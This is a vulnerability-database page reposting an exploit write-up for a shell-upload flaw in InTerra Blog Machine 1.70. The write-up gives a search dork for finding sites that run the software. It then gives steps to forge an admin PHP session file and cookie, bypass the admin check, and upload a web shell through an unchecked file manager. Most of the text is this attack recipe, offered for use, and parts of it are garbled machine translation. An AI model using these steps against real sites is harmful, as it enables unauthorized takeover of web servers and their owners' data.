SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

InTerra Blog Machine <= 1.70 Shell Upload Vulnerability


Arrow  WLB : WLB-2010030027  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-03-07
Arrow  Credit          : inj3ct0r
Arrow  Added by     : SecurityReason
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote : Yes
Arrow  Local     : No
Arrow  Status   : Bug

Arrow  History : [2010-03-07] Started

Arrow  Affected software :  InTerra Blog Machine <= 1.70



Arrow  Text :  

=======================================================
InTerra Blog Machine <= 1.70 Shell Upload Vulnerability
=======================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\
0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit
0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

Product: InTerra Blog Machine
Version: 1.70
Site: Dull.ru
Dork : "Powered by InTerra Blog Machine"

Authorization. The substitution sesii.


PHP code:

//check access
if(!$_SESSION['admin']){
header("Location: " . SERVER_ROOT);
exit;
}


go to / tmp

create sesiyu, 0777 law:

sess_aaec41a3b692b6be0dc292e40b778595

Code:

admin|b:1;

And Cook hammer in your browser.

PHPSESSID=aaec41a3b692b6be0dc292e40b778595


After authentication :

http://127.0.0.1/interra/filemanager/

And pour shell. Checks not (:
lib \ uploader.class.php

PHP code:

function copyFile($name,$destination){
if(!$result = move_uploaded_file($name,$destination)){
$result = copy($name,$destination);
}
return $result;
}

http://127.0.0.1/interra/files/shell.php



# ~ - [ [ : Inj3ct0r : ] ]

If you want change this note, please use UCP



Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

Copyright © SecurityReason.com. All Rights Reserved.